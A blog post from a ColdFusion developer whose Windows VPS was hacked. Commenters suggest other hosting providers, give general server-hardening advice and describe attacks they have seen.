Web Software Architecture and Engineering – Life on the Bleeding Edge

I’ve been using the folks at kickassvps.com for a while now. However, I found that my VPS was unreliable at times, and my blog would regularly go down.
Last night I logged in to discover that mysterious software was installed on my server. I’ve been hacked! The problem with the VPS, as is common in virtualization, is that companies tend to neglect patching these systems.
I tried to use the live support feature on the host’s website, didn’t work! I opened a ticket, and got a response when I woke up the next morning, asking me questions on what to do!
Ummm… so I’ve made the decision to move my blog to another provider. Any recommendations? I’m running Windows 2003 w/ CF8.

Advertisements

Comments on: "VPS Hacked – Need Recommendations" (33)

  1. If you use a file manager, see if it is available to the public without logging into an admin or other CMS system. If so, then look through server logs of that file being accessed and note the referrer. Hackers have been known to search google for “cffm.cfm” or other open source file managers to look for weaknesses.

  2. Thanks guys. Looks like a couple things:

    1. Someone logged into the Windows box and installed software.
    2. Someone continues to try hacking the SQL Server from China.

    Must be Chinese hackers. Sophisticated hosts can simply block traffic from whole countries, and that’s what I’d like.

    As for HostMySite, I pay $35 per month now and get 1GB RAM, whole HostMySite is $116 for 512MB. Its definitely out of my budget, and that is why I didn’t get them in the first place.

  3. Sami,

    I think this qualifies as “You get what you pay for”. For $35/month, I’d expect little to no support, and that’s all I’d ask for. For $189/mo (1GB monthly from HMS), I’d expect top-notch support, and creative solutions to this kind of problem.

  4. Shannon,

    I agree. But having been a Sys Admin at an ISP, the way I see it, if I’m paying that much per month, I can build my own server and do co-location, and get ROI in less than a year based on HMS’s prices. There isn’t much support needed for hosting a blog to warrant that kind of pricing. And if I’m paying 100-200, then I’d do dedicated or colocation. High priced VPS don’t make sense, unless I’m re-hosting and selling $20 accounts and email boxes out to companies.

  5. Now might be a really good time to look into getting into the “cloud”. (Depending on your needs)

    HMS just announced their Cloud hosting. They don’t have prices published.
    http://www.hostmysite.com/cloud9/
    Also check out these guys, they offer a pay for what you use model.
    http://www.mosso.com/
    http://www.gogrid.com

  6. I think Shannon said it best.

    Sami, they aren’t hosting ‘a blog’. They are hosting the VM. Even if you don’t have a single thing on it, you’d still have to pay.
    Your argument makes sense in that it does not cost them a lot to host a VPS. What does cost them time/money is customer service. Which apparently they are lacking, and is probably why their prices are lower.

  7. Mark,

    I did look at that. If I’m getting traffic from China in the cloud, my costs would sky rocket. The cloud is still hairy in my opinion, and I’m watching as it matures.

    Jules,

    Again, I agree. But I meant, I am hosting a blog, they are maintaining the VM. I can’t justify paying $1000+/yr for a blog, then I’d rather move to WordPress. And I don’t need much support for a blog either. Only makes sense if youre hosting dozens of low-end sites and making up that money. At least thats the way I see it.

  8. a vps is a vps and while i’ve been using hms for several years and love their support, the fact of the matter is that everyone is prone to get hacked.

    some simple tips for your vps:

    enable windows firewall. the company firewall will only protect you from external attacks while having a firewall running on the vps will prevent internal attacks.

    did you make sure you locked down iis http://seclists.org/basics/2006/May/0116.html

    did you lock down sql server

  9. Steve Rittler said:

    We’ve been using HostMySite for years now…reliable, impressively fast response to questions/requests, not a single negative thing to say about them.

    Strong positive recommendation for their VPS solution.

  10. I posted an article recently on this topic, of getting what you pay for. I will also say I have had a VPS (the higher tier one) at HMS for over 2 years now. Never had a single problem. They also keep the patches up to date as well. There are also things you can do in Windows itself to lock things down as well. For the SQL Server issue you are having you can add an IPSEC rule to only allow access to the SQL Server from your IP or multiple IPs. This will greatly help you out there.

  11. I think to Sami’s point though not everyone has 120-160 per month to spend on a hobby. For most of us blogging is a hobby and a way to give back to the community and I am not sure about everyone else but I don’t make jack on my blog. If he was talking about client work that would be another but unless you got money to burn It’s hard to justify the cost.

  12. Have you considered a blank linux VPS with Railo. Sure there is a bit of a learning curve and you can’t use MS SQL but the price’s are much cheaper. Or if your homer internet is decent you can host s blog from home on an old PC.

  13. Why are you paying for a VPS + CF8 to just run a blog? A $5/month shared-server hosting account should be just fine. Too much traffic maybe?
    I have a website and added a blog to help promote my business. But its on a shared server… I can’t afford anything more at this point. But I don’t need anything bigger anyway.

  14. Thanks for your comments everyone.

    Dan,

    Thanks for understanding. đŸ™‚

    Jules,

    Yeah, my experience with shared hosting is horrible. Plus, the plan is to add websites. And yes, traffic is a big issue.

  15. Paul,

    I’m definitely thinking maybe Linux and Railo maybe an option. I also have decent Internet access at home, so that is an option as well. All good suggestions.

    Sami

  16. Sami,

    I use VivioTech.net: http://www.viviotech.net/vps.cfm. I pay about $500 annually, but had my own CF license (thanks to CF Objective a couple years back). I have my blog and a few client sites which cover the annual fee. They offer Open BD and I’m sure you can install Railo too. It is a Linux based server, but the basics are pretty easy to learn. I am also very pleased with the support I’ve had from they fellas running the place. I believe Peter F. still used viviotech too, you can give him some affiliate points by using the link from his blog banner: http://blog.maestropublishing.com/

  17. Sami,

    Have you figured out yet how they did it? Do you run your own SQL Server or do you use the one provided by the host? What kind of rights is the SQ Server DSN running with? I’d be curious to know exactly how this happened. Until then, I don’t know that you can assume it is the host’s fault.

    Disclaimer: I am a kickassvps.com customer and kickassvps.com sponsors my blog.

    Depending on the reason, this could just as easily happened with any host if the problem occurred at the application level due to an admin misconfiguration.

  18. Jason,

    Last I heard, that morning they responded, they had elevated the matter to their “senior admin.” I got one reply, that they would follow my instructions and perform Windows Updates and look at the billion ‘sa’ login attempts on SQL.

    Never heard from them again. I just cleaned up as much as I could on my end.

    So, no, I have not figured anything out yet, except even at a base level, they don’t seem very concerned with the hack. I think they had setup the SQL Server… The DSN is running with minimal rights.

    Obviously there is much more I could do, but at a basic level, their VPS’ seem vulnerable.

  19. @Sami,

    I’m curious what software was install.ed I’d like to make sure my VPS was not compromised. Do you think they go it through MS SQL Server? I am not running SQL Server, and right now I do not see anything amiss.

  20. Jason,

    Just IIS, CF8, SQL. Otherwise basic software like browsers, etc.

    Sami

  21. @Sami, sorry, I meant what was the software the hacker installed.

    “Last night I logged in to discover that mysterious software was installed on my server. “

  22. Jason,

    My bad!

    Limewire, RapidShare Downloader, and other P2P downloading tools.

    I’m hoping there isnt much else.

  23. Jason,

    And curiously, Opera 10 as well.

  24. Sami,
    Getting hacked is the worst. I feel ya brother.

    My media center at home got hacked a few weeks ago. They did a brute force password attack on the administrator account. I had remote desk top enabled so I could hit the box from work. That was dumb. What was really weird was that it was someone from Poland that used my box to down load a movie using bittorrent. Probably to circumvent censorship.

    I hope I am not telling you stuff you already know but….

    The best way to avoid a good portion of these hacks attempts for servers *and* desktops is the following.

    Turn off any windows services you are not using. Google for: “turn off windows services & security” or some such to get a list of what is safe to turn off.

    Do a lock down using windows (or another) fire wall. Be draconian.

    KAVPS have an external fire wall. Have them lock down everything except essential services: RDS, POP,SMTP, SFTP, HTTP, SHHTP and any db ports. You can also admin the databases locally using remote desktop.

    Disable the administrator account and create an admin account with an obscure user name.

    Make a user to wait 5 or 10 min after one or two failed logins.

    That will stop most brute force attacks. Most hackers are looking of an easy way in.

    I am on kick ass VPS as well. Now you got me paranoid.

  25. Sami,

    On June 21st – June 23rd, 2009, HostMySite was hit by a cyber attack. An unknown party gained access to the shared hosting services using a ColdFusion exploit and modified numerous cfform.js JavaScript files across multiple domains so that ColdFusion pages which employed the CFFORM tag also loaded a hidden iframe which then attempted to load a bloodhound virus. HostMySite was unable to immediately fix the problem and after several days finally moved the domains on the effected server to another unaffected machine. One of our clients was one such affected domain. I write because HostMySite has not disclosed the attack to its customers, even though its customers’ may have been infected by the virus. If you did not see the attack in-progress, and call HMS support, you would not have heard about it. For a period of two days, multiple sites were serving viruses along with their standard web content.

    Did you experience any problems during this period?

  26. Server Intellect has managed VPS boxes. They can assist ya with updating and patching the box if you don’t have time. Never had a problem with them yet. There support is great too. I hope all goes well for you.

  27. Sami,

    Any luck on picking a new host?

    One more place you might want to look into is http://vps.net/. They have a neat offering. It is scaleable cloud services for a fair price, but they have monthly billing. So, if you do get massive traffic you don’t pay big $.

    They don’t offer CF out of the box. But I have used railo on my blog with out issue. They also have a managed VPS/ cloud option and they offer Turnkey VPSs. Auto patching and updating. (Though, I have not tried Turnkey with railo.)

    I think in the next few months I will be making the move over to vps.net

  28. i have posted your blog on my site

  29. vps histing is important part of web hosting

  30. vps is play imp role in web hosting

  31. That is really sad. I would definitely be looking for a new host!

  32. That is sad. I would definitely be looking for a new host!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: